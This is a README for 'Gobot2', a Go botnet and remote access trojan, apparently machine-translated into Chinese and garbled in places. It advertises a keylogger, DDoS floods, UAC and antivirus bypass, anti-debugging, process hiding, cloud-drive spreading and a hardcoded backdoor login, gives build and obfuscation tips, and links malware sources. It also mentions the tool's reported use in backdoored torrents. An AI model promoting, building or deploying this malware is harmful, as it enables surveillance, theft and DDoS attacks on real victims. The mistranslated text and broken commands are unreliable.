新項目:https://github.com/saturnsvoid/project-whis
Gobot2
看到另一個用戶基於殭屍網絡之後,我想在槍手機構上做更多的工作,但是我最終構建了一些東西。這有問題,但它更像是一個高級POC。 ...我不是一個好的編碼器,但我能夠在網上購買一些基本閱讀。我想處理這個項目,但我停了下來,我擺脫了惡意軟件和病毒的製作……我將繼續進行更多的合法性事情。儘管我將在我的github上發布一些舊項目,而大多數女巫都是惡意的,但我還是把它們放到這裡,以使“好人”與他們戰鬥和親戚更簡單。
C&C功能:
- 寫的
- 跨平台
- SQL數據庫以獲取信息
- 安全登錄系統
- 硬編碼的登錄系統
- 易於使用HTML&CSS C&C
- 基於控制台的C&C
- 緊密的安全性(沒有php!)
- 編碼和混淆數據
- https或http
- 單,選定的所有命令發行
- 用戶代理檢測
- 更多的
機器人功能
- 安全錯誤處理
- 有無限的面板
- 編碼和混淆
- 使用https或http
- 舊(> 24小時)命令處理(不要運行舊命令!)
- 運行PowerShell腳本(通過URL,接受的參數)
- 高級Torrent Seeder(Utorrent,Bittorrent Auto下載客戶端並在需要時隱藏)
- 驅動器播放器(帶有名稱列表)
- Dropbox播放器(帶有名稱列表)
- Google Drive播放器(帶有名稱列表)
- OneDrive吊具(帶有名稱列表)
- 高級鑰匙記錄員(處理所有鍵,窗口標題,剪貼板,autostart, +更多)
- 系統信息(IP,WiFi,用戶,AV,IPCONFIG,CPU,GPU,SYSINFO,已安裝軟件,.NET框架,複習)
- 屏幕捕獲(壓縮,定時捕獲, +更多)
- 下載並運行(MD5 Hash檢查,URL或BASE64,參數,UAC旁路,區域刪除劑)
- DDOS方法(螺紋 /W間隔,HTTPGET,TCPFLOOD,UDPFLOOD,SLECLORIS,HULK,TLSFLOOD,帶寬排水,Goldeneye,Ace)
- 機器人更新(MD5哈希檢查,管理員,區域去除劑)
- UPNP(打開TCP/UDP端口)
- Web-Server(自動UPNP端口80,添加/編輯無限頁面)
- 將程序添加到Windows防火牆
- 主機文件編輯器(備份和還原,更換運行,DNS Flusher)
- 遠程CMD
- 檢測管理權
- 機器人ID生成(永遠不會相同)
- 高級防病毒旁路(隨機內存分配,Func Hop,延遲,運行時負載DLLS /W OBF,隨機連接時間, +更多)
- 先進的反叮噹(ISDEBUGGERPRESENT,PROC檢測,IP組織檢測,文件名檢測,反應系統)
- 單個實例係統
- 反向HTTP代理(Conf。Port,後端服務器)
- 主動防禦(主動註冊表防禦,主動文件防禦,主動看門狗 +更多)不想被殺死。
- UAC旁路(工作所有版本和當前版本的Windows 10 Pro 64bit)
- 高級安裝系統(動態註冊表鍵,動態文件名,保留管理權,廣告系列定位(僅在允許國家 /地區安裝),區域去除劑,將自我添加到防火牆中)
- 卸載系統(刪除所有跟踪)
- 腳本(批次,HTML,VBS,PS)
- 運行shellCode(threadexecute)
- 電源選項(關閉,重新啟動,登錄)
- 啟動錯誤消息
- 消息框(返回回复)
- 開放網站(可見/隱藏)
- 更改首頁
- 更改背景(URL或Base64)
- 運行.EXE(UAC旁路最佳)
- 殺死自我
- 檢查Proc是否正在運行
- 隱藏過程 /W活動模式
- 禁用/啟用(taskmanger,rededit,命令提示)
- 文件滴管(放置在PC上,沒有來自 /w dir選擇的跡線)
有關C&C的一些信息
C&C是一個程序,您可以為Windows,Linux,Mac Systems進行編譯。它是一個自動運行的網絡服務器,可在設置中處理所選端口上的所有連接。如果允許,它將將HTLM C&C提供給連接器,並將有關帳戶,機器人和命令作為SQL數據庫和bots文件(屏幕截圖,鍵盤名單,ect)保存為bots自己的“配置文件”下的文件”。
您可以從程序(更安全)中控制殭屍網絡,也可以從HTML C&C控制它。 C&C的程序非常穩定,基於GO的服務器可以立即處理數百萬或請求時,只需確保您的連接良好即可。
C&C在硬編碼的登錄名(有點像後門)中具有一個構建,如果您“忘記”帳戶登錄,則可以使用。 C&C可以有任意數量的帳戶。
由於它是一個獨立的程序,因此消除了SQLI對C&C的攻擊問題,因此更安全。
如果正確配置,C&C也可以在TOR隱藏服務中運行,並且客戶端(Bot)可以使用洋蔥。 TO或洋蔥。 cab expherner(如果需要)。機器人也可以通過襪子代理使用TOR ...易於執行,Google IT。
如何構建和使用
機器人設置位於“變量”服務器設置中,位於“ server.go”中
使用正確的設置編譯Gobot.go,製作MySQL數據庫並導入DB文件,編譯Server.go使用正確的設置
- Go build -o gobot.exe -ldflags“ -h windowsgui”“ c: gobot2 gobot.go”
- Go build build -0 server.exe“ c: gobot2 console server server.go”
始終使用'-w -s'ldflags編譯,以從二進制中剝離任何調試信息。
包括工具
- 項目的工具(obfuscator(char+1)和其他廢話。
- downloader.go(Golang下載並運行示例)
- downloaderwithuac.go(golang下載並運行UAC旁路示例)
混淆器
它並不是真正的混淆器,它將Char +1移至a = b,c = d,ect。簡單,但它會減慢想要弄亂該程序的人以及搜索關鍵字的程序...
使用的軟件包
- github.com/nebulylabs/go-upnp
- golang.org/x/sys/windows/Registry
- github.com/allendang/w32
- github.com/atotto/clipboard
- github.com/stackexchange/wmi
圖像
- http://prnt.sc/d67nh5
- http://prnt.sc/d67ogh
- http://prnt.sc/d67oqh
- http://prnt.sc/d6esj3
學分和東西
- https://github.com/decred/gominer
- https://github.com/robvanmieghem/gominer
- https://astaxie.gitbooks.io/build-web-application-with-golang/content/content/en/04.5.html
- http://www.adlice.com/runpe-hide-code-behind-legit-process/
- http://www.hacking-tutorial.com/tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
- https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
- https://mholt.github.io/json-to-go/
- https://sentinelone.com/blogs/anti-vm-tricks/
- http://hackforums.net/showthread.php?tid=5383448
- https://github.com/grafov/hulk
- https://github.com/nhooyr/dos
- https://github.com/marcelki/socksress
- https://github.com/ammario/ssynflood
- https://github.com/matishsiao/goinfo/blob/master/goinfo_windows.go
- https://github.com/iamacarpet/go-win64api
- https://github.com/Oneumyvakin/initme/blob/master/windows.go
- https://github.com/lolsquad/ddos-scripts
- https://github.com/vbooter/ddos-scripts
- https://github.com/natefinch/pie
- https://www.windows-commandline.com/enable-remote-desktop-command-line/
- https://www.socketloop.com/tutorials/golang-secure-tls-connection-betnection-server-server-and-client
- https://github.com/lextoumbourou/goodhosts
- https://github.com/yinandyangsecurityawareness/dreamr-botnet
- https://github.com/mauri870/ransomware
- http://www.devdungeon.com/content/making-tor-http-requests-go
- http://www.darul.io/post/2015-07-22_go-lang-simple-redverse-proxy
- https://github.com/mauri870/powershell-reverse-http
- https://github.com/gh0std4ncer/lizkebab/blob/master/client.c
- https://github.com/egebalci/egesploit
- https://github.com/egebalci/hercules
- https://github.com/andrewaeva/gobotnet
- https://github.com/saturnsvoid/gobot
- https://github.com/petercunha/goat
- https://github.com/huin/goupnp
- https://github.com/ytisf/thezoo/tree/master/malwares/source/original
- https://github.com/malwares/remote-access-trojan
- https://github.com/kardianos/service
- https://github.com/vova616/screenshot/blob/master/screenshot_windows.go
- http://hackforums.net/showthread.php?tid=5040543
- http://www.calhoun.io/5-iseful-ways-ways-to-use-closures-in-go/
- https://blogs.technet.microsoft.com/ilikesql_by_dandyman/2013/03/03/10/how-to-to-install-a-msi-file-unattendy/
- https://github.com/tadzik/simpleaes
- https://guitmz.com/win32-liora-b/
- https://github.com/rk/go-cron
- https://breakingmalware.com/vulnerabilities/elastic-boundaries-elevating-privileges-by-envorirnment-variables-variables-expansion/
- https://breakingmalware.com/malware/ardbot-a-malware-under-construction/
- https://breakingmalware.com/malware/furtim-malware-avoids-mass-infection/
- https://www.pugetsystems.com/labs/support-software/how-to-disable-sleep-mode-mode-orhibnation-793/
- https://files.sans.org/summit/digital_forensics_and_incident_response_summit_2015/pdfs/theressomethesomethesomethesomatemthemethemthemethemtheboutwmidevonkerr.pdf
- https://github.com/jasonlvhit/gocron
其他
GO是一種了不起且強大的編程語言。如果您還沒有,請檢查一下; https://golang.org/
捐贈
請捐贈給比特幣地址: 1aebr1utjayu3sgtbkzcljmrr5rs7bp7ee
消息
我剛剛讀了一篇有關流放計算機,https://www.bleepingcomputer.com/news/security/backdoore-torrents-infect-movie-movie-tv-fans-with-gobot2-malware//似乎有人發現這個項目的用途的文章。我與這個小組或個人沒有參與。關於這件事,我無話可說。
-Crab Crab
----------更新日誌--------------------------------------------------------
03/15/2017:Intial上傳...